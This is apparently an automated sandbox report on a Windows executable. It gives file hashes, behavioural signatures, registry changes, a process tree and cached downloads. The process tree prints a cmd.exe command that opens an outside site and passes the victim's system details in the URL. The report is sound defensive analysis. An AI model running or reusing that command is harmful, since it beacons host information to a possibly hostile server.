Windows 7 deprecation
Windows 7 will be removed from tria.ge on 2025-03-31
Analysis
-
max time kernel
149s -
max time network
193s -
platform
windows7_x64 -
resource
win7-20221111-en -
resource tags
arch:x64arch:x86image:win7-20221111-enlocale:en-usos:windows7-x64system -
submitted
27/11/2022, 15:17
Static task
static1
Behavioral task
behavioral1
Sample
1e7960a65a709610f36d00791c88717a984229e457146c4f5925cfb50df39b28.exe
Resource
win7-20221111-en
Behavioral task
behavioral2
Sample
1e7960a65a709610f36d00791c88717a984229e457146c4f5925cfb50df39b28.exe
Resource
win10v2004-20220812-en
General
-
Target
1e7960a65a709610f36d00791c88717a984229e457146c4f5925cfb50df39b28.exe
-
Size
143KB
-
MD5
98513e29a9be23e63a13d0d950820666
-
SHA1
bc08499739216a236d478ae98c8fc0b25d828df0
-
SHA256
1e7960a65a709610f36d00791c88717a984229e457146c4f5925cfb50df39b28
-
SHA512
ae3c8e4d1c8af8d3819811373e8618e3ad904148c8728e1eeec4dba3970742932c40bc8cf41a9e6a2964d081ccb056e93a4643488b6dd4ebd6423fb3227eeb68
-
SSDEEP
3072:iN6ZekwVJIlgps5q9Eb648qwlS/+TfQO45Db/:pe9IB83ID5X/
Malware Config
Signatures
-
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.
-
description ioc Process Set value (int) \REGISTRY\USER\S-1-5-21-3406023954-474543476-3319432036-1000\Software\Microsoft\Internet Explorer\Main\CompatibilityFlags = "0" iexplore.exe Set value (int) \REGISTRY\USER\S-1-5-21-3406023954-474543476-3319432036-1000\Software\Microsoft\Internet Explorer\Recovery\AdminActive\{BC2BEB61-6F27-11ED-B1EF-6A950B37D0A0} = "0" iexplore.exe Key created \REGISTRY\USER\S-1-5-21-3406023954-474543476-3319432036-1000\Software\Microsoft\Internet Explorer\LowRegistry iexplore.exe Key created \REGISTRY\USER\S-1-5-21-3406023954-474543476-3319432036-1000\Software\Microsoft\Internet Explorer\Zoom iexplore.exe Set value (str) \REGISTRY\USER\S-1-5-21-3406023954-474543476-3319432036-1000\Software\Microsoft\Internet Explorer\Main\WindowsSearch\Version = "WS not running" IEXPLORE.EXE Key created \REGISTRY\USER\S-1-5-21-3406023954-474543476-3319432036-1000\Software\Microsoft\Internet Explorer\GPU iexplore.exe Key created \REGISTRY\USER\S-1-5-21-3406023954-474543476-3319432036-1000\Software\Microsoft\Internet Explorer\InternetRegistry iexplore.exe Key created \REGISTRY\USER\S-1-5-21-3406023954-474543476-3319432036-1000\Software\Microsoft\Internet Explorer\IntelliForms iexplore.exe Key created \REGISTRY\USER\S-1-5-21-3406023954-474543476-3319432036-1000\Software\Microsoft\Internet Explorer\Toolbar iexplore.exe Key created \REGISTRY\USER\S-1-5-21-3406023954-474543476-3319432036-1000\Software\Microsoft\Internet Explorer\Toolbar\WebBrowser iexplore.exe Key created \REGISTRY\USER\S-1-5-21-3406023954-474543476-3319432036-1000\Software\Microsoft\Internet Explorer\Recovery\AdminActive iexplore.exe Key created \REGISTRY\USER\S-1-5-21-3406023954-474543476-3319432036-1000\Software\Microsoft\Internet Explorer\Main IEXPLORE.EXE Set value (str) \REGISTRY\USER\S-1-5-21-3406023954-474543476-3319432036-1000\Software\Microsoft\Internet Explorer\Main\FullScreen = "no" iexplore.exe Key created \REGISTRY\USER\S-1-5-21-3406023954-474543476-3319432036-1000\Software\Microsoft\Internet Explorer\Main iexplore.exe Key created \REGISTRY\USER\S-1-5-21-3406023954-474543476-3319432036-1000\Software\Microsoft\Internet Explorer\BrowserEmulation\LowMic iexplore.exe Set value (data) \REGISTRY\USER\S-1-5-21-3406023954-474543476-3319432036-1000\Software\Microsoft\Internet Explorer\Main\Window_Placement = 2c0000000200000003000000ffffffffffffffffffffffffffffffff2400000024000000aa04000089020000 iexplore.exe Key created \REGISTRY\USER\S-1-5-21-3406023954-474543476-3319432036-1000\Software\Microsoft\Internet Explorer\LowRegistry\DontShowMeThisDialogAgain iexplore.exe Key created \REGISTRY\USER\S-1-5-21-3406023954-474543476-3319432036-1000\Software\Microsoft\Internet Explorer\PageSetup iexplore.exe Key created \REGISTRY\USER\S-1-5-21-3406023954-474543476-3319432036-1000\Software\Microsoft\Internet Explorer\Main\WindowsSearch iexplore.exe Set value (str) \REGISTRY\USER\S-1-5-21-3406023954-474543476-3319432036-1000\Software\Microsoft\Internet Explorer\Main\WindowsSearch\Version = "WS not running" iexplore.exe Key created \REGISTRY\USER\S-1-5-21-3406023954-474543476-3319432036-1000\Software\Microsoft\Internet Explorer\Recovery\PendingRecovery iexplore.exe Set value (int) \REGISTRY\USER\S-1-5-21-3406023954-474543476-3319432036-1000\Software\Microsoft\Internet Explorer\Recovery\PendingRecovery\AdminActive = "0" iexplore.exe Key created \REGISTRY\USER\S-1-5-21-3406023954-474543476-3319432036-1000\Software\Microsoft\Internet Explorer\IETld\LowMic iexplore.exe Key created \REGISTRY\USER\S-1-5-21-3406023954-474543476-3319432036-1000\Software\Microsoft\Internet Explorer\LowRegistry\DOMStorage iexplore.exe Key created \REGISTRY\USER\S-1-5-21-3406023954-474543476-3319432036-1000\Software\Microsoft\Internet Explorer\Main\WindowsSearch IEXPLORE.EXE -
Suspicious use of FindShellTrayWindow 2 IoCs
pid Process 2040 1e7960a65a709610f36d00791c88717a984229e457146c4f5925cfb50df39b28.exe 1156 iexplore.exe -
Suspicious use of SendNotifyMessage 1 IoCs
pid Process 2040 1e7960a65a709610f36d00791c88717a984229e457146c4f5925cfb50df39b28.exe -
Suspicious use of SetWindowsHookEx 6 IoCs
pid Process 1156 iexplore.exe 1156 iexplore.exe 1364 IEXPLORE.EXE 1364 IEXPLORE.EXE 1364 IEXPLORE.EXE 1364 IEXPLORE.EXE -
Suspicious use of WriteProcessMemory 12 IoCs
description pid Process procid_target PID 2040 wrote to memory of 1768 2040 1e7960a65a709610f36d00791c88717a984229e457146c4f5925cfb50df39b28.exe 30 PID 2040 wrote to memory of 1768 2040 1e7960a65a709610f36d00791c88717a984229e457146c4f5925cfb50df39b28.exe 30 PID 2040 wrote to memory of 1768 2040 1e7960a65a709610f36d00791c88717a984229e457146c4f5925cfb50df39b28.exe 30 PID 2040 wrote to memory of 1768 2040 1e7960a65a709610f36d00791c88717a984229e457146c4f5925cfb50df39b28.exe 30 PID 1768 wrote to memory of 1156 1768 cmd.exe 32 PID 1768 wrote to memory of 1156 1768 cmd.exe 32 PID 1768 wrote to memory of 1156 1768 cmd.exe 32 PID 1768 wrote to memory of 1156 1768 cmd.exe 32 PID 1156 wrote to memory of 1364 1156 iexplore.exe 33 PID 1156 wrote to memory of 1364 1156 iexplore.exe 33 PID 1156 wrote to memory of 1364 1156 iexplore.exe 33 PID 1156 wrote to memory of 1364 1156 iexplore.exe 33
Processes
-
C:\Users\Admin\AppData\Local\Temp\1e7960a65a709610f36d00791c88717a984229e457146c4f5925cfb50df39b28.exe"C:\Users\Admin\AppData\Local\Temp\1e7960a65a709610f36d00791c88717a984229e457146c4f5925cfb50df39b28.exe"1⤵
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
- Suspicious use of WriteProcessMemory
PID:2040 -
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c "start http://securedfileinfo.com/404.jsp?chid=5300108^&rsn=plde^&details=^|v6.1.7601x64sp1.0ws^|tt35^|dt0^|dc100^|fs-2^|dh0^|ec13^|se12007^|dr4^|ds0^|rs0^|p1"2⤵
- Suspicious use of WriteProcessMemory
PID:1768 -
C:\Program Files\Internet Explorer\iexplore.exe"C:\Program Files\Internet Explorer\iexplore.exe" http://securedfileinfo.com/404.jsp?chid=5300108&rsn=plde&details=|v6.1.7601x64sp1.0ws|tt35|dt0|dc100|fs-2|dh0|ec13|se12007|dr4|ds0|rs0|p13⤵
- Modifies Internet Explorer settings
- Suspicious use of FindShellTrayWindow
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
PID:1156 -
C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE"C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE" SCODEF:1156 CREDAT:275457 /prefetch:24⤵
- Modifies Internet Explorer settings
- Suspicious use of SetWindowsHookEx
PID:1364
-
-
-
Network
MITRE ATT&CK Enterprise v6
Replay Monitor
Loading Replay Monitor...
Downloads
-
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\265C0DEB29181DD1891051371C5F863A_46F574BDF8F8E3AC29733131E4667BA4
Filesize472B
MD503ad9fc0b00b5df3165dc2fb1e3b0a3e
SHA1f8243335a8bc24d989bddd346048a055e1d0bdeb
SHA256366b28d491f7fd632e31c1ce97f939555f7dcee14bb6875737ed2d3e96fa32ec
SHA512a3cd8a001366e6c1b96d2b920d56e6efd34e9b69b9805e1a2b0c270346712e22420366f8bd18bbb1dd16fa60d481ad65b13385a66a3f1fa0d7aadaaa27b99796
-
Filesize
1KB
MD51519171ba0e9b6aabdd22495c93b43f8
SHA1da916b57522c4c4cbac2aedc3354bc6c69a56270
SHA256dfb271a64ffabd0110e6c943e6052fca6dcb7cc738c9cc4c03ce3732361fa318
SHA5127392b921cdb6419c616d744e9556b09d38a2e0956cf0ee0687aba4b4ff75ad7692440afa6d99daeea67f0c07197b466990d6d2c6e4d3567cd8f15b0750dcff2d
-
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\CAF4703619713E3F18D8A9D5D88D6288_A7725538C46DE2D0088EE44974E2CEBA
Filesize724B
MD5f569e1d183b84e8078dc456192127536
SHA130c537463eed902925300dd07a87d820a713753f
SHA256287bc80237497eb8681dbf136a56cc3870dd5bd12d48051525a280ae62aab413
SHA51249553b65a8e3fc0bf98c1bc02bae5b22188618d8edf8e88e4e25932105796956ae8301c63c487e0afe368ea39a4a2af07935a808f5fb53287ef9287bc73e1012
-
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\265C0DEB29181DD1891051371C5F863A_46F574BDF8F8E3AC29733131E4667BA4
Filesize402B
MD54848c7d8c80834a6edffcb91e390b8fe
SHA1efcd9c8dd20beb11c952371a02a0ca69493f6d33
SHA25677ddbe20b6f9d2486f68b91bd2e05feac5f9a6ffddef92160a46ef051a909f33
SHA51269e3a8f546ec5d1591b2319b484999af9b8d1d260a9cc3798ace6d112c7d5e90753aaa1914aaaf34f277a01b38662fee3fda0d01dd5010367b624937f74bd91a
-
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\646C991C2A28825F3CC56E0A1D1E3FA9
Filesize184B
MD5f47c1eb8af157b1345995db1fc048abc
SHA1c620b9764a1cdad8491c56dae92fd11a57964400
SHA2564e57775d8b0eec64719c050f5f8c88a31a90dedb1e61a4db4c78a19359b27bdc
SHA512318569ed053ed08be0bd5aa4d1d68aaf806ed4593f442841756eb86c8751f8e4e48d34a9bab9eff5af59f0a1d59ea0aa98c60d92873b4fde46b5256d91a5f2ba
-
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015
Filesize342B
MD504fb56ed6f8a8db77133966ed979a32d
SHA1d290f152c4ae243ef5962ac769e2a0dea98105c0
SHA2563de0a9d3a3ad1db4642766dd32a000940619eaec809e9ad0681ab9570bb7b3b7
SHA512c75407d4ae84a970bf9205858f2c2636f64a82350c1d3738805b5923b46f243c34872c49359a561882aa7a7eb07bf710489b10e36c00c38262e1de2bf59af24c
-
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\CAF4703619713E3F18D8A9D5D88D6288_A7725538C46DE2D0088EE44974E2CEBA
Filesize392B
MD565d8f62f93474c5ffff522de58a8a5c1
SHA10a1505af22b07d15febe975eedb02efece9ef8f1
SHA256e1046bf80230e5738c1e0ba6edd4832193dda8969c04b9cd1666e2f6b9159dff
SHA5122b41b89ea8ab73040908f72c9322319669cc9e9bd03205d1c4a82711b58edf6959df4afe938a64e228cd41829185daa797b0d85808fc2db5462750aeaa575036